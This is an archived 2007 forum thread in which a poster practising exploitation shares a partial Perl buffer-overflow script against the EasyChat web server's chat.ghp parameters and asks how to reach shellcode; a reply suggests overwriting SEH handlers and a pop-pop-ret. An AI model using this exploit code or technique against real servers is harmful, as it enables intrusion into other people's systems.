|
Luigi Auriemmaaluigi.org (ARCHIVE-ONLY FORUM!) |
|
It is currently 19 Jul 2012 16:06
|
View unanswered posts | View active topics
|
Page 1 of 1
|
[ 2 posts ] |
|
Author |
Message |
rab
|
Post subject: EasyChat server code execution Posted: 10 Sep 2007 22:09 |
|
Joined: 14 Aug 2007 15:47 Posts: 1
|
Hey, I'm practicing exploitation and I thought I would try this. So far I can overflow the buffer and control EIP. The problem is no registers point to my shellcode, so how can I get code execution to work?
[code]
#!/usr/bin/perl
use IO::Socket;
$expl0it = "\x90" x 220;
$expl0it .= "A" x 4;
$expl0it .= "C" x 12;
$sock = IO::Socket::INET->new( PeerAddr => "localhost",
PeerPort => 80,
Proto => 'tcp' ) || die "Error connecting: $!\n";
print $sock "GET /chat.ghp?username=".$expl0it."&password=".$expl0it."&room=1&sex=2 HTTP/1.1\r\nHost: localhost\r\n\r\n";
[/code]
thanks
|
|
Top |
|
|
|
|
|
|
|
n00b
|
Post subject: Posted: 12 Sep 2007 13:01 |
|
Joined: 14 Aug 2007 13:32 Posts: 71
|
Well if no registers hold your shell code or the user supplied data try to over write the seh handlers that is your only option ive saw this loads of times eip get over written and nothing holds our shell code.Add more buffer see if you can control the seh handlers,Then you can just do a pop pop ret into the stack.
|
|
Top |
|
|
|
Page 1 of 1
|
[ 2 posts ] |
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot post attachments in this forum
|
|